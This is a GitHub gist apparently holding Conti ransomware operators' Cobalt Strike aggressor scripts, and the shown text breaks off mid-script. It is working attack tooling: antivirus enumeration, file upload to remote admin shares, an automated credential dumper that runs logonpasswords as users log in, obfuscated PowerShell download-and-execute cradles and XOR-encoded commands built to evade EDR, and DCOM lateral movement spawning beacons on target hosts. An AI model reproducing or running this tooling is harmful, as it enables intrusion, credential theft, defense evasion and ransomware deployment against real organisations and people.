Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@MHaggis

MHaggis/conti.cna

Created August 9, 2021 14:15
Show Gist options
  • Star 20 You must be signed in to star a gist
  • Fork 8 You must be signed in to fork a gist
  • Save MHaggis/4814555da8ec61bd7971f33fbdc9c11e to your computer and use it in GitHub Desktop.
Save MHaggis/4814555da8ec61bd7971f33fbdc9c11e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
conti.cna
#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!
#Long ass one-liner :)
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$zz.Id.ToString(), \$zz.Name.Split('\"')[0], \$zz.Path.ToString()}}}};\$av_loop3 = foreach (\$av2 in \$av_list){foreach (\$key1 in \$av_install1){if (\$key1.DisplayName -match \$av2 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key1.DisplayName.ToString(), \$key1.DisplayVersion.ToString(), \$key1.InstallDate.ToString()}}}};Write-Output \"`nPID|Name|Path`n\";Write-Output \$av_loop;Write-Output \"`nWindows Defender AV Signature Version:\";(Get-ItemProperty -Path \$regkey).ASSignatureVersion;Write-Output \"`nAV Name|Version|Install Date`n\";Write-Output \$av_loop2;Write-Output \$av_loop3";
#AV_Query Command Register
beacon_command_register("AV_Query", "Queries the Registry for AV Installed",
"Syntax: AV_Query\n" .
"Checks HKLM hive for All AntiVirus installed");
#AV_Query alias
alias AV_Query {
blog($1, "\cBDetermining what AntiVirus is installed...");
bpowerpick!($1, $powershellcmd);
bpause($1, int(30000));
bpowerpick!($1, "Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Query \"SELECT * FROM AntiVirusProduct\" | select-object displayName,pathToSignedReportingExe,timestamp| fl");
}
#
# Handy alternative for built-in 'upload' command: lets you upload file to the specified
# remote location. By default, the built-in upload command puts uploaded file to the CWD.
# This script lets us override that behavior.
#
# -------------------------------------------
# beacon> upload implant.exe \\DC1\c$\windows\temp\implant.exe
# [*] Tasked Beacon to upload file (size: 929.25KB) from: (implant.exe) to: (\\DC1\c$\windows\temp\implant.exe)
# [+] host called home, sent: 951655 bytes
#
# -------------------------------------------
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
#
beacon_command_register(
"upload",
"Upload a file to specified remote location.",
"Use: upload </local/path/to/file> [/remote/path/to/file]\n\nUpload a file from local path (first argument) to remote path (second argument, optional).");
sub interpretSize {
local('$s $size');
$s = $1;
if($s == 0) {
$size = "";
}
else if($s < 1024) {
$size .= $s . "B";
}
else if($s < 1024 * 1024) {
$size = round($s / 1024.0, 1);
$size .= "KB";
}
else if($s < 1024 * 1024 * 1024) {
$size = round(($s / 1024.0) / 1024, 1);
$size .= "MB";
}
else if($s < 1024 * 1024 * 1024 * 1024) {
$size = round((($s / 1024.0) / 1024) / 1024, 1);
$size .= "GB";
}
return $size;
}
alias upload {
local('$bid $f $localpath $remotepath $content');
($bid, $localpath, $remotepath) = @_;
if($localpath is $null || strlen($localpath) == 0) {
prompt_file_open("Choose a file", $null, false, lambda({
bupload($bid, $1);
}, $bid => $bid));
return;
}
if($localpath is $null || strlen($localpath) == 0) {
berror($1, "Source file path (local path) must be specified.");
return;
}
if(!-exists $localpath) {
berror($1, "Specified input file does not exist: ( $+ $localpath $+ )");
return;
}
if($remotepath is $null || strlen($remotepath) == 0) {
bupload($bid, $localpath);
return;
}
try {
$f = openf($localpath);
$content = readb($f, -1);
if($content is $null) {
throw "Read empty file";
}
closef($f);
}
catch $message {
berror($1, "Could not read contents of file to upload. Error: $message");
return;
}
btask($1, "Tasked Beacon to upload file (size: " . interpretSize(strlen($content)) . ") from: ( $+ $localpath $+ ) to: ( $+ $remotepath $+ )");
bupload_raw!($1, $remotepath, $content, $localpath);
}
# Blacklist.cna
# Author: Vincent Yiu @vysecurity
# Not responsible for you losing shells, check the blacklists before using.
global('@blacklist');
#$blacklist_pc = @("JOHN-PC", "TEQUILABOOMBOOM", "ANTONY-PC", "XFIIP-PC", "HOME-OFF-D5F0AC");
#$blacklist_user = @();
$blacklist = @(
@("John *","JOHN-PC"),
@("janettdoe *","TEQUILABOOMBOOM"),
@("Antony *","ANTONY-PC"),
@("xfIIp *","XFIIP-PC"),
@("Dave *","HOME-OFF-D5F0AC")
);
on beacon_initial{
# $1 - ID of beacon
# $2 - text of the message
# $3 - time
$pcname = binfo($1, "computer");
$username = binfo($1, "user");
if (@($username, $pcname) isin $blacklist){
blog("[!] Blacklisted Pair: $username, $pcname");
blog("Exiting...");
bexit($1);
blog("Removing...");
bremove($1);
}
}
sub add_blacklist{
# $1 = beacon_id
foreach $beacon ($1){
#elog($beacon);
$pair = @(binfo($beacon, "user"), binfo($beacon, "computer"));
if (!exists($pair)){
blog($beacon, "[*] Adding $pair to blacklist");
add($blacklist, $pair, -1);
}
else{
blog($beacon, "[!] $pair already exists in blacklist");
}
}
show_blacklist($beacon);
}
sub remove_blacklist{
# $1 = beacon_id
foreach $beacon ($1){
$pair = @(binfo($beacon, "user"), binfo($beacon, "computer"));
if (exists($pair)){
blog($beacon, "[*] Removing $pair from blacklist");
remove($blacklist, $pair);
}
else{
blog($beacon, "[!] $pair does not exist in blacklist");
}
}
show_blacklist($beacon);
}
sub show_blacklist{
blog($1, "========================");
if (size($1) <= 0){
blog($1, "[!] Empty Blacklist");
}
foreach $pair ($blacklist){
blog($1, "Blacklist: $pair");
}
blog($1, "========================");
}
popup beacon_bottom {
menu "Blacklist"{
item "Add to Blacklist" {
add_blacklist($1);
}
item "Remove from Blacklist" {
remove_blacklist($1);
}
item "Show Blacklist" {
show_blacklist($1);
}
}
}
sub exists{
# Check if blacklist already exists
# @("user", "computer");
if ($1 in $blacklist){
return true;
}
else{
return false;
}
}
alias blacklist-add {
# $1 = beacon_id
add_blacklist(@($1));
}
alias blacklist-remove {
# $1 = beacon_id
remove_blacklist(@($1));
}
alias blacklist-show {
show_blacklist($1);
}
#### Credpocalypse ####
## Monitor beacons and pick off users as they log in
## Author: Alyssa (ramen0x3f)
## Last Updated: 2017-08-14
## Description: ##
# Automate dumping passwords, so you don't miss new users logging in.
# Set the time interval (default 5m) and Credpocalypse will watch your
# beacons for new users in the running processes. If they aren't in the
# Credentials tab already, Credpocalypse will run logonpasswords.
# NOTE: Your beacon will only be interrupted if logonpasswords is run.
# There's no callback, so I can't smother the output. :-/
## Usage: ##
# Aliases (from a beacon)
# > begin_credpocalypse - watch current beacon
# > end_credpocalypse [all] - stop watching current/all beacon/s
# > credpocalypse_interval [time] - 1m, 5m (default), 10m, 30m, 60m
#
# Commands (from Script Console or ./agscript)
# > begin_credpocalypse - watches *all* beacons
# > end_credpocalypse - stop watching all beacons
# > credpocalypse_interval [time] - 1m, 5m (default), 10m, 30m, 60m
#
# Right click beacon(s) to get a pop up menu that lets you
# - Add to watchlist
# - Remove from watchlist
# - Change time interval that Credpocalypse checks watchlist
# - View the watchlist
######################################################################
## Register Aliases: ##
beacon_command_register("begin_credpocalypse",
"Monitor beacons for new users and steal their passwords when they login",
"Synopsis: begin_credpocalypse\n\n" .
"Adds current beacon to watchlist and routinely checks for new users. When a user is in the process list but not the Credentials tab, credpocalypse runs logonpasswords on that beacon.");
beacon_command_register("end_credpocalypse",
"Stop monitoring beacons for new users",
"Synopsis: end_credpocalypse [all]\n\n" .
"If run without arguments, removes current beacon from watchlist. If 'all' is added, clears whole watchlist.");
beacon_command_register("credpocalypse_interval",
"Change the interval time for Credpocalypse checks",
"Synopsis: credpocalypse_interval [time]\n\n" .
"Options: 1m, 5m (default), 10m, 30m, 60m. If no time supplied, default is used.");
global('@captured_creds @watchlist $interval');
$interval = "5m";
#########
# UTILS #
#########
sub caps {
#Don't ask me how long it took to make this part work.
#But uc breaks on backslashes. Also split. Really everything breaks.
return join("\\", map({ return uc($1); }, split("\\\\", $1)));
}
sub change_interval {
if ( $1 eq "1m" || $1 eq "1M" ) {
$interval = "1m";
}
else if ( $1 eq "10m" || $1 eq "10M" ) {
$interval = "10m";
}
else if ( $1 eq "30m" || $1 eq "30M" ) {
$interval = "30m";
}
else if ( $1 eq "60m" || $1 eq "60M" ) {
$interval = "60m";
}
else {
$interval = "5m";
}
}
sub get_users {
bps($1, lambda({
local('$user $entry $extra $newuser');
$newuser = false;
foreach $entry (split("\n", $2)) {
($null, $null, $null, $null, $user) = split("\\s+", $entry);
$user = caps($user);
if (($user cmp "NT") == 0 || ($user in @captured_creds) || strlen($user) == 0) {
continue; #ignore NT accounts
}
else {
$newuser = true;
break;
}
}
[$callback: $1, $newuser];
}, $callback => $2));
}
sub steal_them_creds {
#Log what you're doing (this output shows in Script Console)
@pids = map({ return beacon_info($1, "pid"); }, @watchlist);
println("Looking for new users in PIDs: " . join(", ", @pids));
#Update creds list
clear(@captured_creds);
foreach %cred (credentials()) { #Add all the options
push(@captured_creds, uc(%cred['realm']) . '\\' . uc(%cred['user']));
}
#Check each beacon for new users
foreach $bid (@watchlist) {
get_users($bid, {
if ( $2 ) {
#Log to beacon
btask($1, "[" . formatDate('yyyy-MM-dd HH:mm:ss z') . "] New user! Running logonpasswords.");
#Log to script console
println("[" . formatDate('yyyy-MM-dd HH:mm:ss z') . "] BID: " . $1 . " PID: " . beacon_info($1, "pid") . " New user! Running logonpasswords.");
#Run
blogonpasswords($1);
}
else {
println("No new users in BID: " . $1 . " PID: " . beacon_info($1, "pid"));
}
});
}
}
#####################
# Headless Commands #
#####################
command begin_credpocalypse {
push(@watchlist, beacon_ids());
println("The Credpocalypse has begun... [dramatic music here]");
}
command end_credpocalypse {
clear(@watchlist);
}
command credpocalypse_interval {
change_interval($1);
println("Updated interval to " . $interval);
}
####################
# Menu and Aliases #
####################
alias begin_credpocalypse {
#Add all beacons to watchlist
if( $2 ) {
push(@watchlist, $2);
}
#Add current beacon to watchlist
else {
push(@watchlist, $1);
}
}
alias end_credpocalypse {
if ((lc($2) cmp "all") == 0) {
clear(@watchlist);
}
else {
pop(@watchlist, $1);
}
}
alias credpocalypse_interval {
change_interval($2);
blog($1, "Updated interval to " . $interval);
}
popup beacon_bottom {
menu "Credpocalypse" {
item "Begin..." {
addAll(@watchlist, $1);
#Update the user
@pids = map({ return beacon_info($1, "pid"); }, $1);
show_message("Added to watchlist: " . join(", ", @pids));
}
item "End..." {
removeAll(@watchlist, $1);
#Update the user
@pids = map({ return beacon_info($1, "pid"); }, $1);
show_message("Removed from watchlist: " . join(", ", @pids));
}
menu "Change Interval" {
item "1 minute" {
$interval = "1m";
println("New interval: " . $interval);
}
item "5 minutes" {
$interval = "5m";
println("New interval: " . $interval);
}
item "10 minutes" {
$interval = "10m";
println("New interval: " . $interval);
}
item "30 minutes" {
$interval = "30m";
println("New interval: " . $interval);
}
item "1 hour" {
$interval = "60m";
println("New interval: " . $interval);
}
}
item "View Watchlist" {
$list = "Watched Beacons:\n============";
foreach $bid (@watchlist) {
$list .= "\n" . beacon_info($bid, "internal") . " (pid " . beacon_info($bid, "pid") . ")";
}
#Update the user
show_message($list);
}
}
}
##########
# EVENTS #
##########
on heartbeat_1m {
if ( size(@watchlist) > 0 && ($interval cmp "1m") == 0) {
steal_them_creds();
}
}
on heartbeat_5m {
if ( size(@watchlist) > 0 && ($interval cmp "5m") == 0) {
steal_them_creds();
}
}
on heartbeat_10m {
if ( size(@watchlist) > 0 && ($interval cmp "10m") == 0) {
steal_them_creds();
}
}
on heartbeat_30m {
if ( size(@watchlist) > 0 && ($interval cmp "30m") == 0) {
steal_them_creds();
}
}
on heartbeat_60m {
if ( size(@watchlist) > 0 && ($interval cmp "60m") == 0) {
steal_them_creds();
}
}
#
# Custom Cobalt Strike Powershell Command & Download Cradles
#
# This script introduces several different methods for Powershell download and execution primitives, other
# than (Net.WebClient).DownloadString and IEX():
#
# set POWERSHELL_DOWNLOAD_CRADLE {
# return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
# }
# [...]
#
# set POWERSHELL_COMMAND {
# [...]
# return "powershell -nop -w hidden -encodedcommand $script";
# }
#
# Aforementioned methods are heavily flagged these days by
# EDRs and AVs so we would prefer to avoid their use. It so happens that Cobalt Strike by default embeds them
# excessively, generating lot of noise in such systems. We can tell Cobalt Strike to structure it's Powershell
# use patterns differently. However, some of introduced custom methods may not work. In such situations, we
# can always switch back to battle tested Cobalt Strike defaults by choosing "Use unsafe Powershell.." to Always.
#
# Watch Script Console for debug logs
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
# For OPSEC reasons we should avoid use of Powershells "-EncodedCommand" parameter and "IEX()"
# Invoke-Expression cmdlet, as they are heavily flagged. Yet, their use is very stable and proven to
# work stabily across various environments and setups. This script can treat these as follows:
# USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 0; # Never use them
# USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 1; # Use them on a seldom occassion (randomly picked)
# USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 2; # Always use them
global('$USE_UNSAFE_ENCODEDCOMMAND_AND_IEX');
$USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 0; # Never use them
$DEBUG = false;
sub debug {
if($DEBUG) {
println("[custom-powershell-hooks] " . $1);
}
}
set POWERSHELL_DOWNLOAD_CRADLE {
local('$url $strategy $cradle @downloadPrimitives @executionPrimitives $download $execution $downloadPrimitive $executionPrimitive');
$url = $1;
# Each download primitive must download data from given ##URL## (that will be replaced later on)
# and put it into $u variable
@downloadPrimitives = @(
# Unsafe (Net.WebClient).DownloadString
"\$u=(New-Object Net.Webclient).DownloadString('##URL##')",
# PowerShell 3.0+: Invoke-RestMethod
"\$u=('##URL##'|%{(IRM \$_)})",
# (Net.WebClient).DownloadString
"\$w=(New-Object Net.WebClient);\$u=\$w.((((\$w).PsObject.Methods)|?{(Item Variable:\_).Value.Name-clike'D*g'}).Name).Invoke('##URL##')",
# Net.WebRequest
"\$u=([IO.StreamReader]::new([Net.WebRequest]::Create('##URL##').GetResponse().GetResponseStream()).ReadToEnd())",
# Msxml2.XMLHTTP COM object
"\$c=New-Object -ComObject MsXml2.ServerXmlHttp;\$c.Open('GET','##URL##',0);\$c.Send();\$u=\$c.ResponseText"
);
# Use $u variable to obtain downloaded data.
@executionPrimitives = @(
# Unsafe IEX()
"IEX(\$u)",
"&(DIR Alias:/I*X)(\$u)",
"\$u|&(DIR Alias:/I*X)",
"&(GCM I*e-E*)(\$u)",
"\$u|&(GCM I*e-E*)",
"&(''.SubString.ToString()[67,72,64]-Join'')(\$u)",
"\$u|&(''.SubString.ToString()[67,72,64]-Join'')"
);
if ($USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 2) {
$cradle = "IEX (New-Object Net.Webclient).DownloadString(' $+ $url $+ ')";
}
else {
# Skip known bad combinations of above primitives.
# Known to not working (download - execution):
# * 3 - 3, 3 - 4
while(true) {
if ($USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 1) {
$download = rand(size(@downloadPrimitives));
$execution = rand(size(@executionPrimitives));
}
else {
$download = rand(size(@downloadPrimitives) - 1) + 1;
$execution = rand(size(@executionPrimitives) - 1 ) + 1;
}
if ($download == 3 && ($execution >= 3 && $execution <= 4)) {
continue;
}
break;
}
$downloadPrimitive = replace(@downloadPrimitives[$download], '##URL##', $url);
$executionPrimitive = @executionPrimitives[$execution];
$cradle = $downloadPrimitive . ";" . $executionPrimitive;
$cradle = replace($cradle, ";;", ";");
}
debug("hooked POWERSHELL_DOWNLOAD_CRADLE (download: $+ $download $+ ; execution: $+ $execution $+ ): $cradle");
return $cradle;
}
set POWERSHELL_COMMAND {
local('$strategy $ley $enc $stub $cmd');
$cmd = "";
if ($USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 1) {
$strategy = rand(4);
}
else {
$strategy = rand(3) + 1;
}
if (($USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 2) || ($strategy == 0)) {
#
# Default, built in and unsafe Cobalt Strike powershell command template.
#
$script = transform($1, "powershell-base64");
if ($2) {
# remote command (e.g., jump psexec_psh)
$cmd = "powershell -nop -w hidden -encodedcommand $script";
}
else {
# local command
$cmd = "powershell -nop -exec bypass -EncodedCommand $script";
}
}
else if ($strategy == 1) {
if ($2) {
$cmd = "powershell -nop -noni -w h -c \" $+ $1 $+ \"";
}
else {
$cmd = "powershell -nop -noni -ep bypass -w h -c \" $+ $1 $+ \"";
}
}
else if($strategy == 2) {
$key = rand(254) + 1;
$enc = replace(transform(str_xor($1, chr($key)), "array"), " ", "");
$stub = "&([scriptblock]::Create((( $+ $enc $+ )|%{\$_-bxor $+ $key $+ }|%{[char]\$_})-join''))";
if ($2) {
$cmd = "powershell -nop -noni -w h -c \" $+ $stub $+ \"";
}
else {
$cmd = "powershell -nop -noni -ep bypass -w h -c \" $+ $stub $+ \"";
}
}
else if ($strategy == 3) {
$key = rand(254) + 1;
$enc = base64_encode(str_xor($1, chr($key)));
$stub = "\$t=([type]'Convert');&([scriptblock]::Create((\$t::((\$t.GetMethods()|?{\$_.Name-clike'F*g'}).Name)(' $+ $enc $+ ')|%{\$_-bxor $+ $key $+ }|%{[char]\$_})-join''))";
if ($2) {
$cmd = "powershell -nop -noni -w h -c \" $+ $stub $+ \"";
}
else {
$cmd = "powershell -nop -noni -ep bypass -w h -c \" $+ $stub $+ \"";
}
}
debug("hooked POWERSHELL_COMMAND (strategy: $strategy $+ ): $cmd");
return $cmd;
}
alias powershell2 {
local('$args');
$args = substr($0, strlen("powershell2 "));
btask($1, "Tasked beacon to run powershell version 2 commands: $args", "T1059");
beacon_execute_job($1, "powershell", " -v 2 $args", 0);
}
#
# Simple Beacon console status bar enhancement showing Beacon's last known current
# working directory path, as well as adding fixed-width to last-seen meter.
#
# Additionally, this script enhances 'cd' command to make it restore previous path
# if "cd -" was issued (and previous path is known).
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
global('%OPERATING_BEACONS');
%OPERATING_BEACONS = %();
beacon_command_register(
"cd",
"Change directory on host. Use '-' to get back to previous cwd.",
"Use: cd [directory]\n\nChange directory on host. Use '-' to get back to previous cwd.");
set BEACON_SBAR_LEFT {
local('$hostname $username $pid $arch $pwd');
$hostname = $2["computer"];
$username = $2["user"];
$pid = $2["pid"];
$arch = $2["arch"];
$pwd = %OPERATING_BEACONS[$1]['cwd'];
return "[\c2 $+ $hostname $+ \o] $username $+ / $+ $pid \cE( $+ $arch $+ )\o\c2 $pwd \o";
}
set BEACON_SBAR_RIGHT {
local('$note $last');
$note = $2["note"];
$last = $2["lastf"];
return "\c6 $note \cE(last: $+ $[5]last $+ )\o";
}
on beacon_tasked {
local('$pwd $sep');
if('cd *' iswm $2) {
$pwd = substr($2, strlen("cd "));
$sep = iff(binfo($1, "os") eq "Windows", "\\", "/");
if($pwd eq "..") {
$pwd = substr(%OPERATING_BEACONS[$1]['cwd'], 0, lindexOf(%OPERATING_BEACONS[$1]['cwd'], $sep));
if($pwd eq "..") {
return "\cC[*]\o $2";
}
}
else if($pwd eq ".") {
return "\cC[*]\o $2";
}
else if((strlen($pwd) >= 2) && (charAt($pwd, 1) ne ":")) {
# relative path?
$pwd = %OPERATING_BEACONS[$1]['cwd'] . $sep . $pwd;
}
%OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd'];
%OPERATING_BEACONS[$1]['cwd'] = $pwd;
return "\cC[*]\o $2";
}
}
set BEACON_OUTPUT_ALT {
local('$pwd');
if($2 ismatch 'Current directory is (.+)') {
$pwd = matched()[0];
%OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd'];
%OPERATING_BEACONS[$1]['cwd'] = $pwd;
return "\cC[*]\o Current directory is \cC" . $pwd . "\o\n";
}
return "\cC[*]\o $2\n";
}
on beacon_input {
if (["$3" trim] eq "ls") {
%OPERATING_BEACONS[$1]['cwd-use-ls'] = 1;
}
}
on beacon_output_ls {
local('$pwd');
if(%OPERATING_BEACONS[$1]['cwd-use-ls'] == 1) {
$pwd = split("\n", ["$2" trim])[0];
if(right($pwd, 2) eq "\\*") {
$pwd = substr($pwd, 0, -2);
}
%OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd'];
%OPERATING_BEACONS[$1]['cwd'] = $pwd;
%OPERATING_BEACONS[$1]['cwd-use-ls'] = 0;
}
}
on beacons {
if(%OPERATING_BEACONS is $null) {
%OPERATING_BEACONS = %();
}
foreach $b ($1) {
if(iff($b in keys(%OPERATING_BEACONS), "true", $null)) {
%OPERATING_BEACONS[$b] = %();
}
}
}
alias cd {
if(($2 eq "-") && (strlen(%OPERATING_BEACONS[$1]['prev-cwd']) > 0)) {
bcd($1, %OPERATING_BEACONS[$1]['prev-cwd']);
return;
}
bcd($1, $2);
}
# Lateral movement techniques based on research by enigma0x3 (Matt Nelson)
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
# Beacon implementation based on comexec.cna by Raphael Mudge
# https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2
# Register alias
beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)",
"Usage: dcom_shellexecute [target] [listener]\n\n" .
"Spawn new Beacon on a target via DCOM ShellExecute Object.");
# Alias for dcom_shellexecute
alias dcom_shellexecute {
if ($3 is $null) {
# If no listener specified, allow user to choose
openPayloadHelper(lambda({
dcom_shellexecute($bid, $target, $1);
}, $bid => $1, $target => $2));
}
else {
dcom_shellexecute($1, $2, $3);
}
}
sub dcom_shellexecute {
local('$payload $cmd');
# Acknowledge task
btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . ") via DCOM ShellExecute");
# Generate PowerShell one-liner for payload
$payload = powershell($3, true, "x86");
$payload = strrep($payload, "powershell.exe ", "");
# Create new DCOM ShellExecute object on remote host
$cmd = '[Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "';
$cmd .= $2;
$cmd .= '")).Item().Document.Application.ShellExecute("powershell.exe", "';
$cmd .= $payload;
$cmd .= '", "C:\Windows\System32\WindowsPowershell\v1.0",';
$cmd .= '$null,0)';
# Use beacon_host_script to generate a shorter DownloadString
# payload that we can use w/ make_token
$short = beacon_host_script($1, $cmd);
bpowershell($1, $short);
}
# DCOM Outlook remote code execution.
sub dcom_outlook {
local('$payload $cmd');
# Acknowledge task
btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . ") via DCOM Outlook");
# Generate PowerShell one-liner for payload
$payload = powershell($3, true, "x86");
$payload = strrep($payload, "powershell.exe ", "");
$cmd = "[System.Activator]::CreateInstance([Type]::GetTypeFromProgID('Outlook.Application').CreateObject(\"ScriptControl\")";
# Use beacon_host_script to generate a shorter DownloadString
# payload that we can use w/ make_token
$short = beacon_host_script($1, $cmd);
bpowershell($1, $short);
}
#DebugKit
# This kit is limited to actions that I use for development and debugging, and thus is not loaded with the rest of them.
# @Und3rf10w
command !beaconinfo {
foreach $beacon (beacons()) {
println("Beacon ID: " . $beacon['id'] . " is " . $beacon['computer']);
}
}
# This basically shows the powershell commandlets loaded for every beacon
command !loaded_powershell{
foreach $beacon (beacons()) {
if (data_query('cmdlets')[$beacon['id']] ne $null) {
println("\c7ID: \cF" . $beacon['id'] . ",\c3 Hostname: \cF" . $beacon['computer'] . ",\c4 Cmdlets Enabled: \cF" . data_query('cmdlets')[$beacon['id']]);
}
}
}
# This shows what responses generated by the c2 server would look like
command !c2_sample_server{
println(data_query('metadata')['c2sample.server']);
}
# This shows what requests generated by the clients look like
command !c2_sample_client{
println(data_query('metadata')['c2sample.client']);
}
# This shows a list of everyone that's connected to the teamserver:
command !who{
println("\c7Currently logged on users on this teamserver are:");
foreach $user (data_query('users')){
println("\c3 * \cF $user");
}
}
# This command shows a hostname of every sessions that happened, active or inactive. Basically just to provide a list of pwned hosts.
command !pwn3d_hosts {
foreach $session (data_query('sessions')) {
$computer = $session['computer'];
println($computer);
}
}
# Shows the queryable Keys within cobalt strike's data model
command !show_data_keys{
foreach $key (data_keys()){
println("\n\c4=== $key ===");
}
}
# Queries the specified key within cobalt strike's data model
# USAGE: !query_data_key <key_name>
command !query_data_key {
$key_name = $1;
println("\n\c4=== Data for \c8\U$key_name\U \c4data key ===\n");
println(data_query($key_name));
}
# Syncs all of the downloads on the teamserver to a specified path. Recursively recreates the file structure as it was on the system the file was downloaded from
# This is not very safe to use.
# TODO: Figure out how to get the content of a file stored on the teamserver
# USAGE: !sync_all_downloads [/path/on/client/machine/to/save/downloads/to] <IP address of host to download files for>
command !sync_all_downloads {
$file_path = $1; # TODO: sanity check, $1 MUST be provided.
if (!-exists $file_path){
mkdir($filepath);
}
if (!-isDir $file_path){
println("\c4 $file_path is not a directory");
exit("Specified direcotry is not a directory");
}
if (!-canwrite $file_path){
println("\c4 We can not write to $filepath (check permissions?)");
exit("Can not write to specified directory");
}
# foreach $file (downloads()){
# if ($2){
# if ( ! $file['host'] eq $2 ){
# continue
# }
# }
# println("Processing download for " . size(downloads()) . " files...");
# $newpath = $file['path'];
# $newpath = strrep($newpath, "\\", "/");
# if ($newpath eq ""){ $newpath = "/"; } # Sanity check in the event that the new path is blank
# $newpath = $file_path + "/" + $file['host'] + "/" + $newpath;
# if (!-exists $newpath){
# mkdir($newpath);
# }
# $fullfile = $newpath + $file['name'];
# TODO: Figure out how to get the content of a file sitting on the teamserver
# if (checkError($error)) {
# println("Error recieved while trying to write " . $fullfile . ": $error");
# }
# if (-canwrite $fullfile){
# $handle = openf(">>$fullfile");
# println($handle, $fileontheCSServer); #See TODO
# closef($handle);
# } else {
# println("Error while trying to write to $fullfile");
# }
# }
# command !sync_all_downloads {
# $file_path = $1; # TODO: sanity check, $1 MUST be provided.
# if (!-exists $file_path){
# mkdir($filepath);
# }
# if (!-isDir $file_path){
# println("\c4 $file_path is not a directory");
# exit("Specified direcotry is not a directory");
# }
# if (!-canwrite $file_path){
# println("\c4 We can not write to $filepath (check permissions?)");
# exit("Can not write to specified directory");
# }
# foreach $file (downloads()){
# if ($2){
# if (!$file['host'] eq $2){
# continue
# }
# }
# println("Processing download for " . size(downloads()) . " files...");
# $newpath = $file['path'];
# $newpath = strrep($newpath, "\\", "/");
# if ($newpath eq ""){ $newpath = "/"; } # Sanity check in the event that the new path is blank
# $newpath = $file_path + "/" + $file['host'] + "/" + $newpath;
# if (!-exists $newpath){
# mkdir($newpath);
# }
# # $fullfile = $newpath + $file['name'];
# # TODO: Figure out how to get the content of a file sitting on the teamserver
# # if (checkError($error)) {
# # println("Error recieved while trying to write " . $fullfile . ": $error");
# # }
# # if (-canwrite $fullfile){
# # $handle = openf(">>$fullfile");
# # println($handle, $fileontheCSServer); #See TODO
# # closef($handle);
# # } else {
# # println("Error while trying to write to $fullfile");
# # }
# }
}
# Generates and display a process tree for the selected beacon.
# Use this to determine your current beacon's exposure to HIDS.
# I've ran into situations where HIDS/AV will attempt to kill as many parents of a malicous process as possible
sub pstreeBpsArray {
@ps_arry = split('\n', $2);
$b_pid = beacon_info($1, "pid");
treeBuilder(@ps_arry, $b_pid, 0);
pstreeCreate(@tree, size(@tree));
blog($1, $treeoutput);
}
sub treeBuilder{
$b_pid = $2;
@ps_arry = $1;
$x = $3;
foreach $entry (@ps_arry){
($name, $ppid, $pid) = split("\\s+", $entry);
if ($pid eq $b_pid){
@tree[$x][0] = $name;
@tree[$x][1] = $pid;
@tree[$x][2] = $ppid;
treeBuilder(@ps_arry, $ppid, $x++);
}
}
}
sub pstreeCreate {
$y = 0;
$first_time_bool = true;
@full_tree = $1;
println(@full_tree);
$x = $2;
$x--;
while ($x >= 0){
$spacer = ("\t" x $y);
if (@full_tree[$x][0] ne $null){
if ($first_time_bool ne true){
$treeoutput = $treeoutput . "\n" . $spacer . "↳ ";
}
}
$first_time_bool = false;
$treeoutput = $treeoutput . "(" . @full_tree[$x][1] . ") " . @full_tree[$x][0];
$x--;
$y++;
}
return $treeoutput;
}
# This alias checks whether CS thinks the beacon is an admin based on the '-isadmin' function
alias !iscsadmin{
if (-isadmin $1){
blog($1, "Beacon is admin");
} else{
blog($1, "Beacon is not admin");
}
}
popup beacon_bottom {
menu "DebugKit" {
item "Notify at next check-in"{
local('$bid');
foreach $bid ($1){
openOrActivate($bid);
binput($bid, "checkin");
bcheckin($bid);
on beacon_checkin{
elog("Beacon: " . $1 . " checked in at $3 as requested");
}
}
}
item "Display Beacon ID" {
local('$bid');
foreach $bid ($1) {
